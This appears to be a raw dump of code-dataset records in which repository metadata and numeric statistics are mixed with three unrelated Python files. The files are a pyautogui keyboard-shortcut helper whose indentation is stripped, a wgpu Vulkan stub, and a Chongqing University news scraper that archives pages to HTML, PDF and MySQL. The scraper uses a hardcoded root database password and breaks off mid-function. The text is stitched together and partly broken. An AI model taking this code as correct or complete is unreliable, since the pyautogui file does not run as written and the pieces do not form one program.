"MIT"
] | null | null | null | auto_script.py | UrWorstNytmare/SEVA---Sparrow-an-Essential-Voice-Assistant | 37c009aaf7e28663681b8bfb217859a4b2f7fccc | [
"MIT"
] | null | null | null | auto_script.py | UrWorstNytmare/SEVA---Sparrow-an-Essential-Voice-Assistant | 37c009aaf7e28663681b8bfb217859a4b2f7fccc | [
"MIT"
] | null | null | null | import pyautogui
import time
def increase_volume():
i = 0
while i < 5:
pyautogui.press("volumeup")
i = i + 1
def decrease_volume():
i = 0
while i < 5:
pyautogui.press("volumedown")
i = i + 1
def switch_window():
pyautogui.keyDown('alt')
pyautogui.press('tab')
pyautogui.keyUp('alt')
def restore_down():
pyautogui.keyDown('win')
pyautogui.press('down')
pyautogui.keyUp('win')
def minimize_window():
pyautogui.keyDown('win')
pyautogui.press('down')
pyautogui.press('down')
pyautogui.keyUp('win')
def maximize_window():
pyautogui.keyDown('win')
pyautogui.press('up')
pyautogui.keyUp('win')
def copy():
pyautogui.keyDown('ctrl')
pyautogui.press('c')
pyautogui.keyUp('ctrl')
def cut():
pyautogui.keyDown('ctrl')
pyautogui.press('x')
pyautogui.keyUp('ctrl')
def paste():
pyautogui.keyDown('ctrl')
pyautogui.press('v')
pyautogui.keyUp('ctrl')
def select_all():
pyautogui.keyDown('ctrl')
pyautogui.press('a')
pyautogui.keyUp('ctrl')
def save():
pyautogui.keyDown('ctrl')
pyautogui.press('s')
pyautogui.keyUp('ctrl')
def save_as():
pyautogui.keyDown('ctrl')
pyautogui.keyDown('shift')
pyautogui.press('s')
pyautogui.keyUp('shift')
pyautogui.keyUp('ctrl')
def close_current_program():
pyautogui.keyDown('alt')
pyautogui.press('f4')
pyautogui.keyUp('alt')
def open_settings():
pyautogui.keyDown('win')
pyautogui.press('i')
pyautogui.keyUp('win')
| 20.897436 | 38 | 0.60184 | 182 | 1,630 | 5.32967 | 0.258242 | 0.216495 | 0.123711 | 0.179381 | 0.602062 | 0.242268 | 0.195876 | 0.059794 | 0 | 0 | 0 | 0.005654 | 0.240491 | 1,630 | 77 | 39 | 21.168831 | 0.777868 | 0 | 0 | 0.555556 | 0 | 0 | 0.08886 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.222222 | false | 0 | 0.031746 | 0 | 0.253968 | 0 | 0 | 0 | 0 | null | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 3 |
8e9c5a5f580743470028916ac01c27e2fac8992d | 262 | py | Python | wgpu/backends/vk.py | Correct-Syntax/wgpu-py | de57c89183b2092ff73e584fed3494a59d396269 | [
"BSD-2-Clause"
] | 74 | 2020-07-07T06:27:55.000Z | 2022-03-21T10:50:00.000Z | wgpu/backends/vk.py | Correct-Syntax/wgpu-py | de57c89183b2092ff73e584fed3494a59d396269 | [
"BSD-2-Clause"
] | 98 | 2020-06-16T12:20:27.000Z | 2022-03-23T17:35:44.000Z | wgpu/backends/vk.py | Correct-Syntax/wgpu-py | de57c89183b2092ff73e584fed3494a59d396269 | [
"BSD-2-Clause"
] | 11 | 2020-06-16T11:57:01.000Z | 2021-10-05T13:55:07.000Z | """
We *could* implement our own Vulkan backend, so we would not need the wgpu lib.
It would be a lot of work to build and maintain though, so unless the
Rust wgpu project is abandoned or something, this is probably a bad idea.
"""
raise NotImplementedError()
| 29.111111 | 79 | 0.755725 | 45 | 262 | 4.4 | 0.844444 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.187023 | 262 | 8 | 80 | 32.75 | 0.929577 | 0.854962 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 3 |
8eaece1eb32abdc455db7d5a4c88320431dcd8e6 | 47,345 | py | Python | news_cqu.py | Tiangewang0524/cqu_spider | 60899b8ca6b6cf7fa24a8b346cd1461481017129 | [
"Apache-2.0"
] | null | null | null | news_cqu.py | Tiangewang0524/cqu_spider | 60899b8ca6b6cf7fa24a8b346cd1461481017129 | [
"Apache-2.0"
] | 1 | 2020-11-21T08:09:17.000Z | 2020-12-03T13:14:52.000Z | news_cqu.py | Tiangewang0524/cqu_spider | 60899b8ca6b6cf7fa24a8b346cd1461481017129 | [
"Apache-2.0"
] | null | null | null | """
爬取原网页的html,过滤新闻内容并重新拼接,保留原网页样式。
"""
import pymysql
import datetime
import requests
from lxml import etree
import pdfkit
import os
import time
import json
import re
# 敏感词过滤类,AC自动机
import Ac_auto
# 任务id
task_id = 2
# 爬取的地址和名称
spider_url = 'https://news.cqu.edu.cn/newsv2/'
spider_name = '重大新闻网'
# 爬虫程序爬取主页和首页的运行日期
spider_month = [1, 7]
spider_day = [1]
# 睡眠时间
sleep_time = 0.1
# mysql登录信息
conn = pymysql.connect(
host='localhost',
port=3307,
user='root',
passwd='123456',
db='spider_test',
use_unicode=True,
charset="utf8mb4"
)
# mysql 插入
# 插入spider结果表
insert_result = '''
INSERT INTO t_spider_result VALUES (NULL, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, NULL)
'''
# 全局字典变量,以键值对(键:对应URL,值:标题)形式存储爬取的数据记录。
dict_data = dict()
# pdfkit配置及设置
confg = pdfkit.configuration(wkhtmltopdf=r'/usr/local/bin/wkhtmltopdf')
options = {
'page-size': 'A4',
'viewport-size': 1920*1080
}
# 伪装http请求头部
headers = {
'User-Agent':
'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0;'
}
# 从数据库配置表里获取xpath, 并解析获取内容
def get_xpath_content(html, xpath_name):
# 去掉空格字符串函数
def not_empty(s):
return s and s.strip()
cur.execute("SELECT xpath FROM t_spider_config_xpath WHERE name = %s", xpath_name)
xpath = cur.fetchone()
xpath = xpath[0]
content = html.xpath(xpath)
# 对content做处理, 元素小于2的处理成字符串, 并去掉首尾多余的空格, 大于2的去掉空格字符串
if len(content) < 2:
content = ''.join(content)
content = content.strip()
else:
content = list(filter(not_empty, content))
return content
# 获取配置表的id,赋值给结果表
def get_conf_id(module_name=None):
if module_name:
cur.execute("SELECT id FROM t_spider_conf WHERE moduleName like %s ", '%' + module_name + '%')
conf_id = cur.fetchone()
conf_id = conf_id[0]
return conf_id
# 查找所有栏目的url(板块url),并保存
def all_urls_list(f_data):
global dict_data
# 读取字典中的数据
f_data.seek(0, 0)
content = f_data.read()
if content:
dict_data = json.loads(content)
heading = '新闻网'
# 根据时间需求爬取主页及各级首页,需求:1月1日和7月1日各爬取一次,其他时间不做爬取
run_date = datetime.date.today()
if run_date.month in spider_month and run_date.day in spider_day:
print('正在爬取 {} 主页。'.format(spider_name))
# 存储index的记录,放进字典和数据库,如果已经存在,则不存储
judge = spider_url in dict_data.keys()
if not judge:
dict_data[spider_url] = heading
# 创建文件夹
# 先判断文件夹是否存在,不存在则创建文件夹
now_dir = os.getcwd()
new_dir = now_dir + '/' + heading + '首页'
dir_judge = os.path.exists(new_dir)
if not dir_judge:
os.mkdir(new_dir)
res = requests.get(spider_url, headers=headers)
res.encoding = 'UTF-8'
raw_html = res.text
html_filter = sensitive_word_filter(raw_html)
html_filter = path_rewrite(html_filter)
timestamp = round(time.time())
html_file = new_dir + '/' + str(timestamp) + '.html'
pdf_file = new_dir + '/' + str(timestamp) + '.pdf'
# 获取配置表的id,赋值给结果表
conf_id = get_conf_id('所有栏目')
time_now = datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S')
cur.execute(insert_result, (conf_id, 'index', spider_url, html_filter, html_file, pdf_file, time_now, heading, run_date, ''))
conn.commit()
json_data = json.dumps(dict_data)
f_data.seek(0, 0)
f_data.write(json_data)
try:
with open(html_file, 'w+', encoding='UTF-8') as f1:
f1.write(html_filter)
# html转pdf
pdfkit.from_url(spider_url, pdf_file, configuration=confg, options=options)
print('《{}》 的首页已储存,转换pdf格式已成功。'.format(heading))
time.sleep(sleep_time)
except IOError:
print("Warning: wkhtmltopdf读取文件失败, 可能是网页无法打开或者图片/css样式丢失。")
else:
print('{} 首页记录已爬取过且保存在数据库中!'.format(heading))
else:
print('爬虫程序启动日期并非 ', end='')
for month in spider_month:
for day in spider_day:
print('{} 月 {} 日, '.format(month, day), end='')
print('{} 主页不做爬取!'.format(spider_name))
r = requests.get(spider_url, headers=headers)
r.encoding = 'UTF-8'
html = etree.HTML(r.text)
news_heading_url_list = []
try:
news_heading_url_list = get_xpath_content(html, '所有栏目URL的xpath')
# 将主页的url去掉
news_heading_url_list.remove(news_heading_url_list[0])
# 增加快讯,专题两个板块
news_heading_url_list.append('https://news.cqu.edu.cn/newsv2/list-15.html')
news_heading_url_list.append('http://news.cqu.edu.cn/kjcd/')
except IndexError:
print("xpath配置错误!")
except etree.XPathEvalError:
print("数据库里未找到记录!")
# print(news_heading_url_list)
return news_heading_url_list
# 查找每个栏目/板块下的每一页的url(列表url),并保存
# 适用于第一大类:新闻模块,第二大类:媒体重大,第三大类:通知公告简报,第四大类:学术预告, 第五大类:快讯
def get_url_list(url, all_urls, f_data):
global dict_data
# 读取字典中的数据
f_data.seek(0, 0)
content = f_data.read()
if content:
dict_data = json.loads(content)
url_list = []
r = requests.get(url, headers=headers)
r.encoding = 'UTF-8'
html = etree.HTML(r.text)
news_heading = ''
# 获取板块在news_heading_url_list的序号,并获取板块名称以及板块下总的新闻数目
# 对 快讯板块做处理:
if url == 'https://news.cqu.edu.cn/newsv2/list-15.html':
try:
news_heading = get_xpath_content(html, '快讯类栏目标题xpath')
news_heading = ''.join(news_heading)
# print(news_heading)
except IndexError:
print("xpath配置错误!")
except etree.XPathEvalError:
print("数据库里未找到记录!")
temp_url = url
else:
cur.execute("SELECT xpath from t_spider_config_xpath where name = %s", '新闻类栏目标题xpath')
xpath = cur.fetchone()
xpath = xpath[0]
# 根据不同的栏目指定不同的xpath
index = all_urls.index(url)
xpath = xpath.replace('?', str(index + 2))
try:
news_heading = html.xpath(xpath)
news_heading = ''.join(news_heading)
# print(news_heading)
except IndexError:
print("xpath配置错误!")
except etree.XPathEvalError:
print("数据库里未找到记录!")
temp_url = url + '?page=1'
# 查找最大页数
page = html.xpath('/html/body/div[@class="row"]/div/div[@class="lists"]/div[@class="page"]/a[12]/text()')
page = ''.join(page)
# print(page)
max_page = int(page)
# 根据时间需求爬取主页及各级首页,需求:1月1日和7月1日各爬取一次,其他时间不做爬取
run_date = datetime.date.today()
if run_date.month in spider_month and run_date.day in spider_day:
list_heading = '各级首页'
print('正在爬取 {} 栏目首页。'.format(news_heading))
# 存储list第一页的记录,放进字典和数据库,如果已经存在,则不存储
judge = temp_url in dict_data.keys()
if not judge:
dict_data[temp_url] = list_heading
# 创建文件夹
# 先判断文件夹是否存在,不存在则创建文件夹
now_dir = os.getcwd()
new_dir = now_dir + '/' + news_heading
dir_judge = os.path.exists(new_dir)
if not dir_judge:
os.mkdir(new_dir)
res = requests.get(temp_url, headers=headers)
res.encoding = 'UTF-8'
raw_html = res.text
html_filter = sensitive_word_filter(raw_html)
html_filter = path_rewrite(html_filter)
timestamp = round(time.time())
html_file = new_dir + '/' + str(timestamp) + '.html'
pdf_file = new_dir + '/' + str(timestamp) + '.pdf'
# 获取配置表的id,赋值给结果表
conf_id = get_conf_id(news_heading)
time_now = datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S')
cur.execute(insert_result, (conf_id, 'list', temp_url, html_filter, html_file, pdf_file, time_now, list_heading, run_date, ''))
conn.commit()
json_data = json.dumps(dict_data)
f_data.seek(0, 0)
f_data.write(json_data)
try:
with open(html_file, 'w+', encoding='UTF-8') as f1:
f1.write(html_filter)
# html转pdf
pdfkit.from_url(temp_url, pdf_file, configuration=confg, options=options)
print('栏目 《{}》 的首页已储存,转换pdf格式已成功。'.format(news_heading))
time.sleep(sleep_time)
except IOError:
print("Warning: wkhtmltopdf读取文件失败, 可能是网页无法打开或者图片/css样式丢失。")
else:
print('{} 栏目 首页记录已爬取过且保存在数据库中!'.format(news_heading))
else:
print('爬虫程序启动日期并非 ', end='')
for month in spider_month:
for day in spider_day:
print('{} 月 {} 日, '.format(month, day), end='')
print('{} 栏目首页不做爬取!'.format(news_heading))
# 对 快讯板块做处理:
if url == 'https://news.cqu.edu.cn/newsv2/list-15.html':
for i in range(1, max_page + 1):
temp_url = url[:-5] + '-' + str(i) + '.html'
url_list.append(temp_url)
else:
for i in range(1, max_page + 1):
# print('爬取网上新闻的第{}页......'.format(i))
temp_url = url + '?page=' + str(i)
url_list.append(temp_url)
# print(url_list)
return url_list
# 查找专题 栏目下的每一页的url(列表url),并保存, 返回一个字典文件。
def get_topic_url_list(url, f_data):
global dict_data
# 读取字典中的数据
f_data.seek(0, 0)
content = f_data.read()
if content:
dict_data = json.loads(content)
url_dict = dict()
r = requests.get(url, headers=headers)
r.encoding = 'UTF-8'
html = etree.HTML(r.text)
news_heading = '专题'
# 根据时间需求爬取主页及各级首页,需求:1月1日和7月1日各爬取一次,其他时间不做爬取
run_date = datetime.date.today()
if run_date.month in spider_month and run_date.day in spider_day:
list_heading = '各级首页'
print('正在爬取 {} 栏目首页。'.format(news_heading))
# 存储专题list的记录,放进字典和数据库,如果已经存在,则不存储
judge = url in dict_data.keys()
if not judge:
dict_data[url] = list_heading
# 创建文件夹
# 先判断文件夹是否存在,不存在则创建文件夹
now_dir = os.getcwd()
new_dir = now_dir + '/' + news_heading
dir_judge = os.path.exists(new_dir)
if not dir_judge:
os.mkdir(new_dir)
res = requests.get(url, headers=headers)
res.encoding = 'UTF-8'
raw_html = res.text
html_filter = sensitive_word_filter(raw_html)
html_filter = path_rewrite(html_filter)
timestamp = round(time.time())
html_file = new_dir + '/' + str(timestamp) + '.html'
pdf_file = new_dir + '/' + str(timestamp) + '.pdf'
# 获取配置表的id,赋值给结果表
conf_id = get_conf_id(news_heading)
time_now = datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S')
cur.execute(insert_result, (conf_id, 'list', url, html_filter, html_file, pdf_file, time_now, list_heading, run_date, ''))
conn.commit()
json_data = json.dumps(dict_data)
f_data.seek(0, 0)
f_data.write(json_data)
try:
with open(html_file, 'w+', encoding='UTF-8') as f1:
f1.write(html_filter)
# html转pdf
pdfkit.from_url(url, pdf_file, configuration=confg, options=options)
print('栏目 《{}》 的主页已储存,转换pdf格式已成功。'.format(news_heading))
time.sleep(sleep_time)
except IOError:
print("Warning: wkhtmltopdf读取文件失败, 可能是网页无法打开或者图片/css样式丢失。")
else:
print('{} 栏目 主页记录已爬取过且保存在数据库中!'.format(news_heading))
else:
print('爬虫程序启动日期并非 ', end='')
for month in spider_month:
for day in spider_day:
print('{} 月 {} 日, '.format(month, day), end='')
print('{} 栏目首页不做爬取!'.format(news_heading))
try:
topic_urls_list = get_xpath_content(html, '专题网址xpath')
topic_names_list = get_xpath_content(html, '专题标题xpath')
# print(topic_urls_list)
# print(topic_names_list)
# 首页4个专题的URL添加进topic_urls_list, 将四个专题标题名添加进topic_names_list
topic_name = ['毕业季|青春不落幕 友谊不散场', '辉煌70年•追梦重大人', '不忘初心 牢记使命', '一带一路年会']
for i in range(4, 8):
topic_urls_list.append('http://news.cqu.edu.cn/newsv2/index.php?m=special&c=index&specialid=8' + str(i))
topic_names_list.append(topic_name[(i - 4)])
# 给每个专题标题名添加’专题_‘进行区分
temp_list = []
for each in topic_names_list:
temp_list.append('专题_' + each)
topic_names_list = temp_list
url_dict = dict(zip(topic_names_list, topic_urls_list))
# 字典key:专题标题,value:专题链接
# print(url_dict)
except IndexError:
print("xpath配置错误!")
except etree.XPathEvalError:
print("数据库里未找到记录!")
return url_dict
# 读取新闻模块每个页面的url,获取新闻模块的每条新闻的归档元数据,并将页面转成pdf格式保存
def get_news_info(url_list, module_url, all_urls, f_data):
global dict_data
# 读取字典中的数据
f_data.seek(0, 0)
content = f_data.read()
if content:
dict_data = json.loads(content)
# 获取配置表的id,赋值给结果表
conf_id = get_conf_id('新闻模块')
# 新闻模块新闻数累加器
sum_i = 0
# 新闻模块页数计数器
page = 1
# 获取栏目名称
news_heading = ''
dict_news = dict()
dict_news = {'网站名称': spider_name, '网站域名': spider_url}
r = requests.get(module_url, headers=headers)
r.encoding = 'UTF-8'
html = etree.HTML(r.text)
cur.execute("SELECT xpath from t_spider_config_xpath where name = %s", '新闻类栏目标题xpath')
xpath = cur.fetchone()
xpath = xpath[0]
# 根据不同的栏目指定不同的xpath
index = all_urls.index(module_url)
xpath = xpath.replace('?', str(index + 2))
try:
news_heading = html.xpath(xpath)
news_heading = ''.join(news_heading)
# print(news_heading)
except IndexError:
print("xpath配置错误!")
except etree.XPathEvalError:
print("数据库里未找到记录!")
# 创建文件夹
# 先判断文件夹是否存在,不存在则创建文件夹
now_dir = os.getcwd()
new_dir = now_dir + '/' + news_heading
dir_judge = os.path.exists(new_dir)
if not dir_judge:
os.mkdir(new_dir)
# 每一页的url
for url in url_list:
r = requests.get(url, headers=headers)
r.encoding = 'UTF-8'
raw_html = r.text
html = etree.HTML(raw_html)
links_list = get_xpath_content(html, '新闻模块网址xpath')
title_list = get_xpath_content(html, '新闻模块标题xpath')
# 每一条新闻的url + 每一个标题
for each_url, title in zip(links_list, title_list):
print('正在爬取 {} 栏目下,第 {} 页 总第 {} 条新闻。'.format(news_heading, page, sum_i + 1))
# 存储每一个新闻模块链接URL的记录,放进字典和数据库,如果已经存在,则不存储
judge = each_url in dict_data.keys()
try:
if not judge:
dict_data[each_url] = title
r = requests.get(each_url, headers=headers)
r.encoding = 'UTF-8'
raw_html = r.text
html = etree.HTML(raw_html)
html_filter = sensitive_word_filter(raw_html)
html_filter = path_rewrite(html_filter)
timestamp = round(time.time())
html_file = new_dir + '/' + str(timestamp) + '.html'
pdf_file = new_dir + '/' + str(timestamp) + '.pdf'
dict_news['所属栏目'] = news_heading
try:
cur.execute("SELECT name from t_spider_config_xpath where name like %s", '新闻模块' + '%')
xpath_name = cur.fetchall()
for each in xpath_name:
dict_news[each[0][4:-5]] = get_xpath_content(html, each[0])
except IndexError:
print("xpath配置错误!")
except etree.XPathEvalError:
print("数据库里未找到记录!")
dict_news['标题'] = title
dict_news['网址'] = each_url
time_now = datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S')
dict_news['采集时间'] = time_now
dict_news['采集人'] = '档案馆'
if dict_news['发布时间']:
release_time = dict_news['发布时间']
else:
release_time = None
json_dict = json.dumps(dict_news, ensure_ascii=False, indent=4)
print(json_dict)
judge_identifier = not_found_judge(raw_html, r)
# 判断网页是不是404 not found
if judge_identifier:
cur.execute(insert_result, (conf_id, 'detail', each_url, html_filter, html_file, pdf_file,
time_now, news_heading, release_time, json_dict))
conn.commit()
json_data = json.dumps(dict_data)
f_data.seek(0, 0)
f_data.write(json_data)
sum_i += 1
with open(html_file, 'w+', encoding='UTF-8') as f1:
f1.write(html_filter)
# html转pdf
pdfkit.from_url(each_url, pdf_file, configuration=confg, options=options)
print('该新闻《{}》pdf格式已转换成功。'.format(title))
time.sleep(sleep_time)
else:
# 将404 not found 记录进数据库
html_filter = '404 not found'
cur.execute(insert_result, (conf_id, 'detail', each_url, html_filter, '', '',
time_now, news_heading, None, json_dict))
conn.commit()
json_data = json.dumps(dict_data)
f_data.seek(0, 0)
f_data.write(json_data)
print('该新闻《{}》网页不存在, 以‘404 not found’为网页内容存入数据库。'.format(title))
sum_i += 1
else:
sum_i += 1
print('{} 栏目 的 第 {} 条新闻 已爬取过且保存在数据库中!'.format(news_heading, sum_i))
except IOError:
print("Warning: wkhtmltopdf读取文件失败, 可能是网页无法打开或者图片/css样式丢失。")
except IndexError:
print("该栏目《{}》下的新闻已全部爬取完!".format(news_heading))
break
print('第{}页已经爬取完'.format(page))
page += 1
print('{} 栏目下 共有{}页 {}条新闻'.format(news_heading, page - 1, sum_i))
# 读取媒体重大每个页面的url,获取媒体重大的每条新闻的归档元数据,并将页面转成pdf格式保存
def get_media_info(url_list, f_data):
global dict_data
# 读取字典中的数据
f_data.seek(0, 0)
content = f_data.read()
if content:
dict_data = json.loads(content)
# 媒体重大新闻数累加器
sum_i = 0
# 媒体重大页数计数器
page = 1
# 媒体重大发布时间处理计数器
i = 0
news_heading = '媒体重大'
# 获取配置表的id,赋值给结果表
conf_id = get_conf_id(news_heading)
dict_media = dict()
dict_media = {'网站名称': spider_name, '网站域名': spider_url}
# 创建文件夹
# 先判断文件夹是否存在,不存在则创建文件夹
now_dir = os.getcwd()
new_dir = now_dir + '/' + news_heading
dir_judge = os.path.exists(new_dir)
if not dir_judge:
os.mkdir(new_dir)
# 每一页的url
for url in url_list:
r = requests.get(url, headers=headers)
r.encoding = 'UTF-8'
raw_html = r.text
html = etree.HTML(raw_html)
links_list = get_xpath_content(html, '媒体重大网址xpath')
title_list = get_xpath_content(html, '媒体重大标题xpath')
release_time_list = get_xpath_content(html, '媒体重大发布时间xpath')
# 格式化发布时间
temp_list = []
for each in release_time_list:
each = each.strip()
# print(each)
temp_list.append(each)
release_time_list = []
while i < len(temp_list) - 1:
release_time = temp_list[i] + '月' + temp_list[i + 1] + '日'
release_time_list.append(release_time)
i += 2
# 将计数器清零
i = 0
# 每一条新闻的url + 每一条发布时间 + 每一个标题
for each_url, release_time, title in zip(links_list, release_time_list, title_list):
print('正在爬取 {} 栏目下,第 {} 页 总第 {} 条新闻。'.format(news_heading, page, sum_i + 1))
# 存储每一个媒体重大链接URL的记录,放进字典和数据库,如果已经存在,则不存储
judge = each_url in dict_data.keys()
try:
if not judge:
dict_data[each_url] = title
r = requests.get(each_url, headers=headers)
r.encoding = 'UTF-8'
raw_html = r.text
html = etree.HTML(raw_html)
html_filter = sensitive_word_filter(raw_html)
html_filter = path_rewrite(html_filter)
timestamp = round(time.time())
html_file = new_dir + '/' + str(timestamp) + '.html'
pdf_file = new_dir + '/' + str(timestamp) + '.pdf'
resource = ''
dict_media['所属栏目'] = news_heading
# 从数据库获取xpath, 并根据xpath获取内容
try:
cur.execute("SELECT name from t_spider_config_xpath where name like %s", news_heading + '%')
xpath_name = cur.fetchall()
for each in xpath_name:
# [4:-5]表示去掉开头‘媒体重大’四个字符和结尾‘xpath’五个字符
if each[0][4:-5] == '具体新闻内容':
resource = get_xpath_content(html, each[0])[-1]
if each[0][4:-5] == '作者所属单位':
department = get_xpath_content(html, each[0])[:-4]
dict_media[each[0][4:-5]] = department
else:
dict_media[each[0][4:-5]] = get_xpath_content(html, each[0])
except IndexError:
print("xpath配置错误!")
except etree.XPathEvalError:
print("数据库里未找到记录!")
dict_media['标题'] = title
dict_media['发布时间'] = release_time
dict_media['来源(转载来源)'] = resource
dict_media['网址'] = each_url
time_now = datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S')
dict_media['采集时间'] = time_now
dict_media['采集人'] = '档案馆'
json_dict = json.dumps(dict_media, ensure_ascii=False, indent=4)
print(json_dict)
judge_identifier = not_found_judge(raw_html, r)
# 判断网页是不是404 not found
if judge_identifier:
cur.execute(insert_result, (conf_id, 'detail', each_url, html_filter, html_file, pdf_file,
time_now, news_heading, None, json_dict))
conn.commit()
json_data = json.dumps(dict_data)
f_data.seek(0, 0)
f_data.write(json_data)
sum_i += 1
with open(html_file, 'w+', encoding='UTF-8') as f1:
f1.write(html_filter)
# html转pdf
pdfkit.from_url(each_url, pdf_file, configuration=confg, options=options)
print('该新闻《{}》pdf格式已转换成功。'.format(title))
time.sleep(sleep_time)
else:
# 将404 not found 记录进数据库
html_filter = '404 not found'
cur.execute(insert_result, (conf_id, 'detail', each_url, html_filter, '', '',
time_now, news_heading, None, json_dict))
conn.commit()
json_data = json.dumps(dict_data)
f_data.seek(0, 0)
f_data.write(json_data)
print('该新闻《{}》网页不存在, 以‘404 not found’为网页内容存入数据库。'.format(title))
sum_i += 1
else:
sum_i += 1
print('{} 栏目 的 第 {} 条新闻 已爬取过且保存在数据库中!'.format(news_heading, sum_i))
except IOError:
print("Warning: wkhtmltopdf读取文件失败, 可能是网页无法打开或者图片/css样式丢失。")
except IndexError:
print("该栏目《{}》下的媒体新闻已全部爬取完!".format(news_heading))
break
print('第{}页已经爬取完'.format(page))
page += 1
print('{} 栏目下 共有{}页 {}条媒体新闻'.format(news_heading, page - 1, sum_i))
# 读取通知公告简报每个页面的url,获取通知公告简报的每条新闻的归档元数据,并将页面转成pdf格式保存
def get_notice_info(url_list, f_data):
global dict_data
# 读取字典中的数据
f_data.seek(0, 0)
content = f_data.read()
if content:
dict_data = json.loads(content)
# 通知公告数累加器
sum_i = 0
# 通知公告简报页数计数器
page = 1
news_heading = '通知公告简报'
# 获取配置表的id,赋值给结果表
conf_id = get_conf_id(news_heading)
# 通知公告简报
dict_notice = dict()
dict_notice = {'网站名称': spider_name, '网站域名': spider_url}
# 创建文件夹
# 先判断文件夹是否存在,不存在则创建文件夹
now_dir = os.getcwd()
new_dir = now_dir + '/' + news_heading
dir_judge = os.path.exists(new_dir)
if not dir_judge:
os.mkdir(new_dir)
# 每一页的url
for url in url_list:
r = requests.get(url, headers=headers)
r.encoding = 'UTF-8'
raw_html = r.text
html = etree.HTML(raw_html)
links_list = get_xpath_content(html, '通知公告简报网址xpath')
title_list = get_xpath_content(html, '通知公告简报标题xpath')
# 每一条通知的url + 每一个标题
for each_url, title in zip(links_list, title_list):
print('正在爬取 {} 栏目下,第 {} 页 总第 {} 条通知公告。'.format(news_heading, page, sum_i + 1))
# 存储每一个学术预告链接URL的记录,放进字典和数据库,如果已经存在,则不存储
judge = each_url in dict_data.keys()
try:
if not judge:
dict_data[each_url] = title
r = requests.get(each_url, headers=headers)
r.encoding = 'UTF-8'
raw_html = r.text
html = etree.HTML(raw_html)
html_filter = sensitive_word_filter(raw_html)
html_filter = path_rewrite(html_filter)
timestamp = round(time.time())
html_file = new_dir + '/' + str(timestamp) + '.html'
pdf_file = new_dir + '/' + str(timestamp) + '.pdf'
# 对跳转微信公众号文章的链接做处理
if 'weixin' in each_url:
title = html.xpath('//h2[@class="rich_media_title"]/text()')
title = ''.join(title)
title = title.strip()
dict_notice['所属栏目'] = news_heading
# 从数据库获取xpath, 并根据xpath获取内容
try:
cur.execute("SELECT name from t_spider_config_xpath where name like %s",
news_heading + '%')
xpath_name = cur.fetchall()
for each in xpath_name:
# [6:-5]表示去掉开头‘通知公告简报’四个字符和结尾‘xpath’五个字符
dict_notice[each[0][6:-5]] = get_xpath_content(html, each[0])
except IndexError:
print("xpath配置错误!")
except etree.XPathEvalError:
print("数据库里未找到记录!")
dict_notice['标题'] = title
dict_notice['网址'] = each_url
time_now = datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S')
dict_notice['采集时间'] = time_now
dict_notice['采集人'] = '档案馆'
if dict_notice['发布时间']:
release_time = dict_notice['发布时间']
else:
release_time = None
json_dict = json.dumps(dict_notice, ensure_ascii=False, indent=4)
print(json_dict)
judge_identifier = not_found_judge(raw_html, r)
# 判断网页是不是404 not found
if judge_identifier:
cur.execute(insert_result, (conf_id, 'detail', each_url, html_filter, html_file, pdf_file,
time_now, news_heading, release_time, json_dict))
conn.commit()
json_data = json.dumps(dict_data)
f_data.seek(0, 0)
f_data.write(json_data)
sum_i += 1
with open(html_file, 'w+', encoding='UTF-8') as f1:
f1.write(html_filter)
# html转pdf
pdfkit.from_url(each_url, pdf_file, configuration=confg, options=options)
print('该通知《{}》pdf格式已转换成功。'.format(title))
time.sleep(sleep_time)
else:
# 将404 not found 记录进数据库
html_filter = '404 not found'
cur.execute(insert_result, (conf_id, 'detail', each_url, html_filter, '', '',
time_now, news_heading, None, json_dict))
conn.commit()
json_data = json.dumps(dict_data)
f_data.seek(0, 0)
f_data.write(json_data)
print('该通知《{}》网页不存在, 以‘404 not found’为网页内容存入数据库。'.format(title))
sum_i += 1
else:
sum_i += 1
print('{} 栏目 的 第 {} 条通知 已爬取过且保存在数据库中!'.format(news_heading, sum_i))
except IOError:
print("Warning: wkhtmltopdf读取文件失败, 可能是网页无法打开或者图片/css样式丢失。")
except IndexError:
print("该栏目《{}》下的通知公告简报已全部爬取完!".format(news_heading))
break
print('第{}页已经爬取完'.format(page))
page += 1
print('{} 栏目下 共有{}页 {}条通知公告简报'.format(news_heading, page - 1, sum_i))
# 读取学术预告每个页面的url,获取学术预告的每条新闻的归档元数据,并将页面转成pdf格式保存
def get_academic_info(url_list, f_data):
global dict_data
# 读取字典中的数据
f_data.seek(0, 0)
content = f_data.read()
if content:
dict_data = json.loads(content)
# 讲座数累加器
sum_i = 0
# 学术预告页数计数器
page = 1
news_heading = '学术预告'
# 获取配置表的id,赋值给结果表
conf_id = get_conf_id(news_heading)
dict_academic = dict()
dict_academic = {'网站名称': spider_name, '网站域名': spider_url}
# 创建文件夹
# 先判断文件夹是否存在,不存在则创建文件夹
now_dir = os.getcwd()
new_dir = now_dir + '/' + news_heading
dir_judge = os.path.exists(new_dir)
if not dir_judge:
os.mkdir(new_dir)
# 每一页的url
for url in url_list:
r = requests.get(url, headers=headers)
r.encoding = 'UTF-8'
raw_html = r.text
html = etree.HTML(raw_html)
# 筛选处理讲座链接
links_list = get_xpath_content(html, '学术预告网址xpath')
temp = []
for each in links_list:
if 'http' in each:
temp.append(each)
links_list = temp
title_list = get_xpath_content(html, '学术预告标题xpath')
# 每一条讲座的url + 每一个标题
